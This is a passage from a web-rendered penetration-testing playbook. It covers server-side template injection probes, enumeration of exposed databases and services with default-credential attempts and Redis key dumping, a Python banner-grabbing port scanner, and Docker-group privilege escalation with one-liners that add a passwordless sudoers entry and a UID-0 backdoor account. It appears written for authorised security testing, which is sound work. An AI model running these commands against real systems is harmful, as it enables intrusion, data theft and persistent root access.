&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#c6d0f5;background-color:#303446;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Probes for detection (mathematical evaluation)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;probes &lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt; [
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;{{7*7}}&amp;#34;&lt;/span&gt;, &lt;span style="color:#737994;font-style:italic"&gt;# Jinja2, Twig&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;${7*7}&amp;#34;&lt;/span&gt;, &lt;span style="color:#737994;font-style:italic"&gt;# Freemarker, Velocity&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;&amp;lt;%= 7*7 %&amp;gt;&amp;#34;&lt;/span&gt;, &lt;span style="color:#737994;font-style:italic"&gt;# ERB (Ruby)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;#{7*7}&amp;#34;&lt;/span&gt;, &lt;span style="color:#737994;font-style:italic"&gt;# Ruby string interpolation&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;{{7*&amp;#39;7&amp;#39;}}&amp;#34;&lt;/span&gt;, &lt;span style="color:#737994;font-style:italic"&gt;# Twig (49)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;${{7*7}}&amp;#34;&lt;/span&gt;, &lt;span style="color:#737994;font-style:italic"&gt;# Groovy&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;]
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ca9ee6"&gt;for&lt;/span&gt; probe &lt;span style="color:#99d1db;font-weight:bold"&gt;in&lt;/span&gt; probes:
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; r &lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt; requests&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;get(&lt;span style="color:#e78284"&gt;f&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#34;http://target.com/page?name=&lt;/span&gt;&lt;span style="color:#a6d189"&gt;{&lt;/span&gt;probe&lt;span style="color:#a6d189"&gt;}&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ca9ee6"&gt;if&lt;/span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;49&amp;#34;&lt;/span&gt; &lt;span style="color:#99d1db;font-weight:bold"&gt;in&lt;/span&gt; r&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;text:
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#99d1db"&gt;print&lt;/span&gt;(&lt;span style="color:#e78284"&gt;f&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#34;🔥 SSTI confirmed: &lt;/span&gt;&lt;span style="color:#a6d189"&gt;{&lt;/span&gt;probe&lt;span style="color:#a6d189"&gt;}&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;hr&gt;
&lt;h2 id="20-exposed-infrastructure--mysql-redis-ftp-docker" &gt;
&lt;div&gt;
&lt;a href="#20-exposed-infrastructure--mysql-redis-ftp-docker"&gt;
#
&lt;/a&gt;
20. EXPOSED INFRASTRUCTURE — MYSQL, REDIS, FTP, DOCKER
&lt;/div&gt;
&lt;/h2&gt;
&lt;h3 id="201-exposed-mysql-port-3306" &gt;
&lt;div&gt;
&lt;a href="#201-exposed-mysql-port-3306"&gt;
##
&lt;/a&gt;
20.1 Exposed MySQL (Port 3306)
&lt;/div&gt;
&lt;/h3&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#c6d0f5;background-color:#303446;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Test connectivity&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;timeout &lt;span style="color:#ef9f76"&gt;3&lt;/span&gt; bash -c &lt;span style="color:#a6d189"&gt;&amp;#34;echo &amp;gt; /dev/tcp/&lt;/span&gt;&lt;span style="color:#f2d5cf"&gt;$HOST&lt;/span&gt;&lt;span style="color:#a6d189"&gt;/3306&amp;#34;&lt;/span&gt; &lt;span style="color:#99d1db;font-weight:bold"&gt;&amp;amp;&amp;amp;&lt;/span&gt; &lt;span style="color:#99d1db"&gt;echo&lt;/span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;OPEN&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Try connection&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;mysql -h &lt;span style="color:#f2d5cf"&gt;$HOST&lt;/span&gt; -u root --password&lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt;root
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;mysql -h &lt;span style="color:#f2d5cf"&gt;$HOST&lt;/span&gt; -u admin --password&lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt;admin
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Read banner (without authenticating)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# EOL versions (5.7, 5.6) = multiple unpatched RCE CVEs&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;&lt;strong&gt;Real-world case (CRITICAL)&lt;/strong&gt;: Fitness tech company — MySQL 5.7.42 exposed directly to the internet (port 3306), no firewall. Ubuntu 18.04 EOL. Multiple unpatched RCE and privilege escalation CVEs.&lt;/p&gt;
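&lt;p&gt;Added example, not code from the playbook: the &amp;ldquo;read banner without authenticating&amp;rdquo; step done in Python. A MySQL server sends a Protocol::HandshakeV10 greeting the moment the TCP connection opens, before any credentials are exchanged; it carries the exact server version, the default auth plugin and whether TLS is offered. &lt;code&gt;parse_mysql_greeting&lt;/code&gt; decodes that packet (or the ERR packet a host allow-list returns instead, which is still a confirmed MySQL on that port), and &lt;code&gt;grab_mysql_greeting&lt;/code&gt; fetches it from a live host. The sample packets below are constructed here; the version string was chosen to mirror the case above.&lt;/p&gt;

```python
import socket

def parse_mysql_greeting(data):
    """Parse the first packet a MySQL server sends on connect, before authentication.
    Returns {"kind": "greeting", ...} for HandshakeV10 or {"kind": "error", ...} for an ERR
    packet (e.g. 1130 "Host ... is not allowed to connect")."""
    packet_len = int.from_bytes(data[0:3], "little")     # 3-byte length, 1-byte sequence id
    payload = data[4:4 + packet_len]
    if payload[0] == 0xFF:                                # ERR packet
        code = int.from_bytes(payload[1:3], "little")
        msg = payload[3:]
        if msg[:1] == b"#":                               # optional SQL-state marker + 5 chars
            msg = msg[6:]
        return {"kind": "error", "code": code, "message": msg.decode(errors="replace")}
    if payload[0] != 10:
        raise ValueError(f"unsupported protocol version {payload[0]}")
    end = payload.index(0, 1)                             # server version is NUL-terminated
    version = payload[1:end].decode(errors="replace")
    pos = end + 1
    conn_id = int.from_bytes(payload[pos:pos + 4], "little"); pos += 4
    pos += 8 + 1                                          # auth-plugin-data-part-1, filler
    cap_low = int.from_bytes(payload[pos:pos + 2], "little"); pos += 2
    pos += 1 + 2                                          # charset, status flags
    cap_high = int.from_bytes(payload[pos:pos + 2], "little"); pos += 2
    capabilities = cap_low + cap_high * 65536
    auth_len = payload[pos]; pos += 1
    pos += 10                                             # reserved
    pos += max(13, auth_len - 8)                          # auth-plugin-data-part-2
    plugin = payload[pos:].split(b"\x00", 1)[0].decode(errors="replace")
    return {"kind": "greeting", "version": version, "connection_id": conn_id,
            "auth_plugin": plugin,
            "tls": (capabilities // 0x800) % 2 == 1}      # CLIENT_SSL capability bit

def grab_mysql_greeting(host, port=3306, timeout=3):
    """Connect, read the greeting and close. Nothing is sent, so no login attempt is made."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        return parse_mysql_greeting(s.recv(1024))

# --- Constructed sample packets (not captured from a real host) ----------------
def build_sample_greeting(version="5.7.42-0ubuntu0.18.04.1"):
    payload = bytes([10]) + version.encode() + b"\x00"
    payload += (1234).to_bytes(4, "little")               # connection id
    payload += b"A" * 8 + b"\x00"                         # auth-plugin-data-part-1 + filler
    payload += (0xFFFF).to_bytes(2, "little")             # capability flags, lower (SSL set)
    payload += bytes([0x21])                              # charset utf8_general_ci
    payload += (2).to_bytes(2, "little")                  # status flags (autocommit)
    payload += (0x81FF).to_bytes(2, "little")             # capability flags, upper
    payload += bytes([21]) + b"\x00" * 10                 # auth data length, reserved
    payload += b"B" * 12 + b"\x00"                        # auth-plugin-data-part-2 (13 bytes)
    payload += b"mysql_native_password\x00"
    return len(payload).to_bytes(3, "little") + b"\x00" + payload

def build_sample_error():
    msg = b"Host '203.0.113.5' is not allowed to connect to this MySQL server"
    payload = b"\xff" + (1130).to_bytes(2, "little") + msg
    return len(payload).to_bytes(3, "little") + b"\x00" + payload

if __name__ == "__main__":
    print(parse_mysql_greeting(build_sample_greeting()))
    print(parse_mysql_greeting(build_sample_error()))
```

&lt;p&gt;The greeting is what feeds the CVE check: match the exact version against the vendor release notes rather than the major line. An ERR 1130 means a host allow-list is in place, which narrows the exposure but does not remove it (the listener is still reachable and fingerprintable).&lt;/p&gt;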
&lt;h3 id="202-exposed-redis-port-6379" &gt;
&lt;div&gt;
&lt;a href="#202-exposed-redis-port-6379"&gt;
##
&lt;/a&gt;
20.2 Exposed Redis (Port 6379)
&lt;/div&gt;
&lt;/h3&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#c6d0f5;background-color:#303446;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Test without password&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;redis-cli -h &lt;span style="color:#f2d5cf"&gt;$HOST&lt;/span&gt; PING
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# If &amp;#34;PONG&amp;#34; → no password!&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Dump all keys&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;redis-cli -h &lt;span style="color:#f2d5cf"&gt;$HOST&lt;/span&gt; KEYS &lt;span style="color:#a6d189"&gt;&amp;#39;*&amp;#39;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Read values&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;redis-cli -h &lt;span style="color:#f2d5cf"&gt;$HOST&lt;/span&gt; GET &lt;span style="color:#a6d189"&gt;&amp;#34;session:abc123&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h3 id="203-exposed-mongodb-port-27017" &gt;
&lt;div&gt;
&lt;a href="#203-exposed-mongodb-port-27017"&gt;
##
&lt;/a&gt;
20.3 Exposed MongoDB (Port 27017)
&lt;/div&gt;
&lt;/h3&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#c6d0f5;background-color:#303446;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;mongosh &lt;span style="color:#a6d189"&gt;&amp;#34;mongodb://&lt;/span&gt;&lt;span style="color:#f2d5cf"&gt;$HOST&lt;/span&gt;&lt;span style="color:#a6d189"&gt;:27017&amp;#34;&lt;/span&gt; --eval &lt;span style="color:#a6d189"&gt;&amp;#34;db.adminCommand(&amp;#39;listDatabases&amp;#39;)&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h3 id="204-exposed-postgresql-port-5432" &gt;
&lt;div&gt;
&lt;a href="#204-exposed-postgresql-port-5432"&gt;
##
&lt;/a&gt;
20.4 Exposed PostgreSQL (Port 5432)
&lt;/div&gt;
&lt;/h3&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#c6d0f5;background-color:#303446;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;psql -h &lt;span style="color:#f2d5cf"&gt;$HOST&lt;/span&gt; -U postgres -d postgres -c &lt;span style="color:#a6d189"&gt;&amp;#34;SELECT version()&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h3 id="205-ftp--anonymous-and-brute-force" &gt;
&lt;div&gt;
&lt;a href="#205-ftp--anonymous-and-brute-force"&gt;
##
&lt;/a&gt;
20.5 FTP — Anonymous and Brute Force
&lt;/div&gt;
&lt;/h3&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#c6d0f5;background-color:#303446;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Test anonymous&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;ftp -n &lt;span style="color:#f2d5cf"&gt;$HOST&lt;/span&gt; &lt;span style="color:#a6d189"&gt;&amp;lt;&amp;lt;EOF
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a6d189"&gt;user anonymous anonymous
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a6d189"&gt;ls
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a6d189"&gt;quit
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a6d189"&gt;EOF&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Common users:&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# admin, root, backup, ftp, upload, download, www-data, mysql, postgres&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Pure-FTPd, vsFTPd, ProFTPD versions — check CVEs&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;&lt;strong&gt;Real-world case&lt;/strong&gt;: Electronic monitoring company — FTP server with 14 valid users identified by timing oracle. Rate-limit after multiple attempts. Anonymous disabled.&lt;/p&gt;
&lt;h3 id="206-exposed-coolify-port-3000" &gt;
&lt;div&gt;
&lt;a href="#206-exposed-coolify-port-3000"&gt;
##
&lt;/a&gt;
20.6 Exposed Coolify (Port 3000)
&lt;/div&gt;
&lt;/h3&gt;
&lt;p&gt;Coolify is a self-hosted PaaS. If its dashboard or API is reachable without authentication, it gives full control over deploys and the infrastructure behind them.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#c6d0f5;background-color:#303446;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Check if it responds&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;curl -s &lt;span style="color:#a6d189"&gt;&amp;#34;http://&lt;/span&gt;&lt;span style="color:#f2d5cf"&gt;$HOST&lt;/span&gt;&lt;span style="color:#a6d189"&gt;:3000/api/health&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;curl -s &lt;span style="color:#a6d189"&gt;&amp;#34;http://&lt;/span&gt;&lt;span style="color:#f2d5cf"&gt;$HOST&lt;/span&gt;&lt;span style="color:#a6d189"&gt;:3000/register&amp;#34;&lt;/span&gt; &lt;span style="color:#737994;font-style:italic"&gt;# Open registration?&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;curl -s &lt;span style="color:#a6d189"&gt;&amp;#34;http://&lt;/span&gt;&lt;span style="color:#f2d5cf"&gt;$HOST&lt;/span&gt;&lt;span style="color:#a6d189"&gt;:3000/api/settings&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;&lt;strong&gt;Real-world case&lt;/strong&gt;: Fitness tech company — Coolify exposed on port 3000 without authentication, API endpoints responding. Compromise would give full control over deploys, databases, and environment variables.&lt;/p&gt;
&lt;h3 id="207-elasticsearch-port-9200" &gt;
&lt;div&gt;
&lt;a href="#207-elasticsearch-port-9200"&gt;
##
&lt;/a&gt;
20.7 Elasticsearch (Port 9200)
&lt;/div&gt;
&lt;/h3&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#c6d0f5;background-color:#303446;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Cluster info (no auth)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;curl -s &lt;span style="color:#a6d189"&gt;&amp;#34;http://&lt;/span&gt;&lt;span style="color:#f2d5cf"&gt;$HOST&lt;/span&gt;&lt;span style="color:#a6d189"&gt;:9200/&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# List indices&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;curl -s &lt;span style="color:#a6d189"&gt;&amp;#34;http://&lt;/span&gt;&lt;span style="color:#f2d5cf"&gt;$HOST&lt;/span&gt;&lt;span style="color:#a6d189"&gt;:9200/_cat/indices&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Index dump&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;curl -s &lt;span style="color:#a6d189"&gt;&amp;#34;http://&lt;/span&gt;&lt;span style="color:#f2d5cf"&gt;$HOST&lt;/span&gt;&lt;span style="color:#a6d189"&gt;:9200/INDEX_NAME/_search?size=100&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h3 id="208-port-scanning-on-vps" &gt;
&lt;div&gt;
&lt;a href="#208-port-scanning-on-vps"&gt;
##
&lt;/a&gt;
20.8 Port Scanning on VPS
&lt;/div&gt;
&lt;/h3&gt;
&lt;p&gt;On low-cost VPS, it&amp;rsquo;s common to find ALL these services exposed simultaneously:&lt;/p&gt;
&lt;pre tabindex="0"&gt;&lt;code&gt;22 → SSH (key-based? password?)
80 → nginx SPA (React/Vue)
443 → HTTPS (same content)
3000 → Coolify, Grafana
3306 → MySQL exposed (no firewall)
5000 → Flask/Werkzeug
5432 → PostgreSQL
6379 → Redis (no password?)
8080 → Tomcat, Jenkins, alternative API
8443 → Apache direct (bypass nginx)
9000 → MinIO, S3-compatible
9090 → Prometheus metrics
9200 → Elasticsearch
27017 → MongoDB
&lt;/code&gt;&lt;/pre&gt;&lt;hr&gt;
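&lt;p&gt;Added example (not code from the playbook): a Python connect scan over exactly the port list above that records whatever each open port sends first, falls back to a plain HTTP probe when the service stays silent, and guesses the service from the response. Assumptions: TLS is spoken only on 443 and 8443, one host at a time, and the banner heuristics cover SSH, HTTP (with the Server header), Redis in its three states, MySQL/MariaDB, MongoDB and Elasticsearch; anything else is reported as open but unidentified. nmap -sV remains the reference for fingerprinting; this is the quick first pass you run before it.&lt;/p&gt;

```python
import re
import socket
import ssl
import sys
from concurrent.futures import ThreadPoolExecutor

# The port list from 20.8 above.
VPS_PORTS = [22, 80, 443, 3000, 3306, 5000, 5432, 6379, 8080, 8443, 9000, 9090, 9200, 27017]
TLS_PORTS = (443, 8443)            # assumption: TLS only on these two
HTTP_PROBE = b"GET / HTTP/1.0\r\nHost: localhost\r\n\r\n"
SERVER_RE = re.compile(rb"(?im)^Server:\s*(.+?)\s*$")


def classify(port, banner):
    """Guess the service from the first bytes a port returned (heuristics, not nmap -sV)."""
    if banner is None:
        return "closed/filtered"
    if not banner:
        return "open, silent"
    if banner.startswith(b"SSH-"):
        return "ssh " + banner.split(b"\n")[0].strip().decode(errors="replace")
    if banner.startswith(b"HTTP/"):
        # Elasticsearch answers GET / with JSON that names the cluster.
        if b"cluster_name" in banner or b"You Know, for Search" in banner:
            return "elasticsearch"
        m = SERVER_RE.search(banner)
        server = m.group(1).decode(errors="replace") if m else "no Server header"
        return "http (" + server + ")"
    # Redis parses "GET / HTTP/1.0" as a GET command with the wrong arity,
    # so the error prefix tells us whether auth or protected mode is on.
    if banner.startswith(b"-NOAUTH"):
        return "redis (auth required)"
    if banner.startswith(b"-DENIED"):
        return "redis (protected mode)"
    if banner.startswith(b"-ERR"):
        return "redis (no auth)"
    # MySQL/MariaDB send the handshake first; it names the auth plugin.
    if b"mysql_native_password" in banner or b"caching_sha2_password" in banner:
        return "mysql/mariadb (handshake)"
    if b"MongoDB" in banner:
        return "mongodb (http hint page)"
    return "open, unidentified (" + str(len(banner)) + " bytes)"


def grab_banner(host, port, timeout=3.0):
    """Connect, wait briefly for a server-first banner, else send an HTTP probe."""
    try:
        s = socket.create_connection((host, port), timeout=timeout)
    except OSError:
        return None                      # refused or filtered
    try:
        if port in TLS_PORTS:
            ctx = ssl.create_default_context()
            ctx.check_hostname = False   # self-signed certs are the norm on a VPS
            ctx.verify_mode = ssl.CERT_NONE
            s = ctx.wrap_socket(s, server_hostname=host)
        data = b""
        s.settimeout(1.0)
        try:
            data = s.recv(1024)          # SSH and MySQL talk first
        except OSError:
            pass
        if not data:
            s.settimeout(timeout)
            s.sendall(HTTP_PROBE)
            try:
                data = s.recv(4096)
            except OSError:
                pass
        return data
    except OSError:
        return b""                       # TLS failure or reset after connect
    finally:
        s.close()


def scan(host, ports=VPS_PORTS, workers=8):
    """Return {port: service guess} for every port that accepted a connection."""
    with ThreadPoolExecutor(max_workers=workers) as pool:
        banners = list(pool.map(lambda p: grab_banner(host, p), ports))
    return {p: classify(p, b) for p, b in zip(ports, banners) if b is not None}


if __name__ == "__main__":
    target = sys.argv[1] if len(sys.argv) == 2 else "127.0.0.1"
    for port, service in sorted(scan(target).items()):
        print(f"{port:6d}  {service}")
```

&lt;p&gt;Run it as &lt;code&gt;python3 vps_scan.py 203.0.113.10&lt;/code&gt;. The one-second wait before the HTTP probe is what separates server-first protocols from the rest; a port that answers nothing to either is still worth a manual look (PostgreSQL and MongoDB are often silent here).&lt;/p&gt;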
&lt;h2 id="21-docker-privilege-escalation" &gt;
&lt;div&gt;
&lt;a href="#21-docker-privilege-escalation"&gt;
#
&lt;/a&gt;
21. DOCKER PRIVILEGE ESCALATION
&lt;/div&gt;
&lt;/h2&gt;
&lt;h3 id="211-docker-group--root-equivalent" &gt;
&lt;div&gt;
&lt;a href="#211-docker-group--root-equivalent"&gt;
##
&lt;/a&gt;
21.1 Docker Group = Root-Equivalent
&lt;/div&gt;
&lt;/h3&gt;
&lt;p&gt;Users in the &lt;code&gt;docker&lt;/code&gt; group can talk to the daemon without sudo. The daemon runs as root and will bind-mount any host path you ask for, so membership is root-equivalent on the host (the one exception is rootless Docker, where the daemon itself runs as an unprivileged user):&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#c6d0f5;background-color:#303446;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Check if you are in the docker group&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;groups | grep docker
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;getent group docker
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Classic one-liner — add NOPASSWD sudo&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;docker run --rm -v /etc:/host_etc -it ubuntu &lt;span style="color:#8caaee"&gt;\
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; bash -c &lt;span style="color:#a6d189"&gt;&amp;#34;echo &amp;#39;username ALL=(ALL) NOPASSWD:ALL&amp;#39; &amp;gt;&amp;gt; /host_etc/sudoers&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Add user with UID 0&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;docker run --rm -v /etc:/host_etc -it alpine sh -c &lt;span style="color:#8caaee"&gt;\
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;echo &amp;#39;backdoor::0:0:root:/root:/bin/bash&amp;#39; &amp;gt;&amp;gt; /host_etc/passwd&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
